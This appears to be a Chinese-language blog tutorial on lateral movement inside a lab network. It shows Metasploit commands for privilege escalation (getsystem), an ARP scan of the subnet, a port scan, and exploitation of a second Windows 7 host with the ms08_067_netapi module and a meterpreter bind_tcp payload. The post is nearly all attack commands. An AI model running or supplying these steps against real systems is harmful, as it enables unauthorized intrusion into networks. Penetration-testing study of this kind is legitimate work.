內網滲透 -- 獲取內網中其他主機權限

 

每天早上醒來你有兩個選擇:一是蓋上被子繼續做你沒做完的夢,二是掀開被子去完成你未完成的夢。。。

----  網易雲熱評

環境:小攻:Kali 2020,ip:192.168.1.133

          小受:win7 x86,ip:192.168.1.144

          小小受:win7 x64 ,ip:  192.168.1.130

 

一、生成木馬及監聽主機參考上篇文章:

 

 

二、獲取小受的IP地址

meterpreter > getsystem

 

三、獲取內網中存活的主機,以一臺win03主機爲例

meterpreter > run post/windows/gather/arp_scanner rhosts=192.168.1.0/24

 

 

四、端口掃描,看看小小受開放了那些端口

1、選擇用到的模塊:msf5 exploit(multi/handler) > use auxiliary/scanner/portscan/tcp

2、查看需要配置的參數:show options

3、設置要掃描的端口:msf5 auxiliary(scanner/portscan/tcp) > set ports 80,135,445,3389,3306

4、設置小小受ip地址:msf5 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.1.130

5、執行:msf5 auxiliary(scanner/portscan/tcp) > run   

 

 

                                

 

五、利用ms08_067漏洞拿下小小受   

1、搜索ms08_067模塊信息

msf5 auxiliary(scanner/portscan/tcp) > search ms08_067

2、選擇該模塊並設置payload

msf5 > use exploit/windows/smb/ms08_067_netapi

msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/bind_tcp

3、查看需要配置的參數:

msf5 exploit(windows/smb/ms08_067_netapi) > show options

4、設置目標主機並執行

msf5 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.1.130

msf5 exploit(windows/smb/ms08_067_netapi) > run

 

禁止非法,後果自負

歡迎關注公衆號:web安全工具庫

 

 

 

 

 

 

 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章